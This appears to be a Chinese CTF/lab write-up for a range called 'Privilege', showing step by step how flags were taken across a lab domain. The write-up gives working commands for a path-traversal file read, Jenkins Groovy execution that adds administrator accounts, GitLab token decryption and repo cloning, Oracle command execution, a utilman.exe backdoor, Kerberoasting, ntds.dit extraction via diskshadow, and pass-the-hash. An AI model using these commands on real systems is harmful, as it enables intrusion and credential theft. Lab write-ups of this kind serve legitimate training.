Privilege

flag01

1
2
3
4
5
6
7
39.99.141.81:8080 open
39.99.141.81:80 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://39.99.141.81:8080  code:403 len:548    title:None
[*] WebTitle http://39.99.141.81       code:200 len:54646  title:XR SHOP
[+] PocScan http://39.99.141.81/www.zip poc-yaml-backup-file

扫出来两个网站,还有一个www泄露,在tools里面有一个任意文件读取

1
2
3
4
5
6
7
8
9
<?php
$logfile = rawurldecode( $_GET['logfile'] );
// Make sure the file is exist.
if ( file_exists( $logfile ) ) {
  // Get the content and echo it.
  $text = file_get_contents( $logfile );
  echo( $text );
}
exit;

可以读取到第一个flag

1
http://ip/tools/content-log.php?logfile=../../../../../../../../../../../users/administrator/flag/flag01.txt

flag02

根据提示可以继续分析

1
请获取 XR Shop 官网源码的备份文件,并尝试获得系统上任意文件读取的能力。并且,管理员在配置 Jenkins 时,仍然选择了使用初始管理员密码,请尝试读取该密码并获取 Jenkins 服务器权限。Jenkins 配置目录为 C:\ProgramData\Jenkins\.jenkins。

通过任意文件读取读取到了Jenkins的初始密码

1
admin/510235cf43f14e83b88a9f144199655b

jenkins后台命令执行

1
2
println "net user Chu0 whoami@666 /add".execute().text
println "net localgroup administrators Chu0 /add".execute().text

添加用户rdp上去,搭建代理,扫描内网

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
172.22.14.7:445 open
172.22.14.7:8080 open
172.22.14.31:1521 open
172.22.14.7:3306 open
172.22.14.46:445 open
172.22.14.31:445 open
172.22.14.11:445 open
172.22.14.46:139 open
172.22.14.31:139 open
172.22.14.11:139 open
172.22.14.7:139 open
172.22.14.46:135 open
172.22.14.31:135 open
172.22.14.11:135 open
172.22.14.7:135 open
172.22.14.46:80 open
172.22.14.16:80 open
172.22.14.7:80 open
172.22.14.16:22 open
172.22.14.16:8060 open
172.22.14.11:88 open
172.22.14.16:9094 open
[*] alive ports len is: 22
start vulscan
[*] WebTitle http://172.22.14.7:8080   code:403 len:548    title:None
[*] NetInfo
[*]172.22.14.31
   [->]XR-ORACLE
   [->]172.22.14.31
[*] NetInfo
[*]172.22.14.11
   [->]XR-DC
   [->]172.22.14.11
[*] NetBios 172.22.14.46    XIAORANG\XR-0923
[*] NetInfo
[*]172.22.14.7
   [->]XR-JENKINS
   [->]172.22.14.7
[*] NetInfo
[*]172.22.14.46
   [->]XR-0923
   [->]172.22.14.46
[*] NetBios 172.22.14.11    [+] DC:XIAORANG\XR-DC
[*] WebTitle http://172.22.14.46       code:200 len:703    title:IIS Windows Server
[*] WebTitle http://172.22.14.16:8060  code:404 len:555    title:404 Not Found
[*] NetBios 172.22.14.31    WORKGROUP\XR-ORACLE
[*] WebTitle http://172.22.14.16       code:302 len:99     title:None 跳转url: http://172.22.14.16/users/sign_in
[*] WebTitle http://172.22.14.7        code:200 len:54603  title:XR SHOP
[*] WebTitle http://172.22.14.16/users/sign_in code:200 len:34961  title:Sign in · GitLab
[+] PocScan http://172.22.14.7/www.zip poc-yaml-backup-file

发现里面有一个gitlab,根据提示去找对应的tokenC:/ProgramData/Jenkins/.jenkins/credentials.xml,结果如下

1
{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}

解密得到明文

1
2
3
println(hudson.util.Secret.fromString("{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}").getPlainText())

glpat-7kD_qLH2PiQv_ywB9hz2

拉去对应的项目

1
curl --header "PRIVATE-TOKEN:glpat-7kD_qLH2PiQv_ywB9hz2" "http://172.22.14.16/api/v4/projects"

获取对应项目的仓库地址

image-20240921232725600

拉取对应项目

1
2
3
4
5
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/internal-secret.git 
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/xradmin.git 
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/awenode.git 
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/xrwiki.git 
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/gitlab-instance-23352f48/Monitoring.git

在xradmin中的ruoyi-admin/src/main/resources/application-druid.yml找到oracle账号密码

1
2
3
url: jdbc:oracle:thin:@172.22.14.31:1521/orcl
username: xradmin
password: fcMyE8t9E4XdsKf

利用此用户直接命令执行

1
2
proxychains4 odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net user Chu0 whoami@666 /add'
proxychains4 odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net localgroup administrators Chu0 /add'

rdp上去可以拿到flag

flag03

internal-secret里面有一组账号密码

1
XR-0923 | zhangshuai | wSbEajHzZs

查看用户组

1
net user zhangshuai

结果如下

1
本地组成员             *Remote Desktop Users *Remote Management Use

由于属于Remote Management Use,所以可以使用evil-winrm连接机器

1
proxychains4 evil-winrm -i 172.22.14.46 -u zhangshuai -p wSbEajHzZs

机器名和域内机器一样,尝试rdp成功,查看权限存在SeRestorePrivilege权限

1
2
3
4
5
6
7
8
9
10
*Evil-WinRM* PS C:\Users\zhangshuai\Documents> whoami /priv

特权信息
----------------------

特权名                        描述           状态
============================= ============== ======
SeRestorePrivilege            还原文件和目录 已启用
SeChangeNotifyPrivilege       绕过遍历检查   已启用
SeIncreaseWorkingSetPrivilege 增加进程工作集 已启用

发现存在SeRestorePrivilege权限,尝试使用此权限提权,这里如果要上线的话,记得用cmd /c 123.exe执行

1
2
ren utilman.exe utilman.old
ren cmd.exe utilman.exe

将用户锁定然后按WIN+u即可得到system权限,拿到flag3

flag04

向域控查询注册了SPN的用户

1
proxychains4 impacket-GetUserSPNs xiaorang.lab/'XR-0923$' -hashes :1039312ceea16360a67467f2f66c0c37 -dc-ip 172.22.14.11

获取此用户的ST

1
proxychains4 impacket-GetUserSPNs xiaorang.lab/'XR-0923$' -hashes :1039312ceea16360a67467f2f66c0c37 -dc-ip 172.22.14.11 -request-user tianjing

对获取的哈希进行爆破

1
hashcat -a 0 -m 13100 hash.txt ./rockyou.txt

结果如下

1
tianjing/DPQSXSXgh2

尝试rdp上去看看,发现上不去,由于靶机开启了5985端口,所以依然可以使用evil-winrm进行登录

1
proxychains4 evil-winrm -i 172.22.14.11 -u tianjing -p DPQSXSXgh2 2> /dev/null

还是得提权

1
2
3
4
5
6
7
8
9
10
11
12
13
*Evil-WinRM* PS C:\Users\public> whoami /priv

特权信息
----------------------

特权名                        描述             状态
============================= ================ ======
SeMachineAccountPrivilege     将工作站添加到域 已启用
SeBackupPrivilege             备份文件和目录   已启用
SeRestorePrivilege            还原文件和目录   已启用
SeShutdownPrivilege           关闭系统         已启用
SeChangeNotifyPrivilege       绕过遍历检查     已启用
SeIncreaseWorkingSetPrivilege 增加进程工作集   已启用

可以看到SeBackupPrivilege和SeRestorePrivilege状态是Enabled

创建文件raj.dsh

1
2
3
4
set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:

进行格式转换

1
unix2dos raj.dsh

先在c盘根目录创建一个文件夹

1
mkdir Chu0

上传此文件

1
upload raj.dsh

执行命令,跟着来就行

1
2
3
diskshadow /s raj.dsh
robocopy /b z:\windows\ntds . ntds.dit
reg save hklm\system c:\Chu0\system

将这俩文件下载下来

1
2
download ntds.dit
download system

获取哈希

1
impacket-secretsdump -ntds ntds.dit -system system local
1
Administrator:500:aad3b435b51404eeaad3b435b51404ee:70c39b547b7d8adec35ad7c09fb1d277:::

PTH过去拿到最后一个flag

1
proxychains4 impacket-smbexec -hashes :70c39b547b7d8adec35ad7c09fb1d277 xiaorang.lab/administrator@172.22.14.11 -codec gbk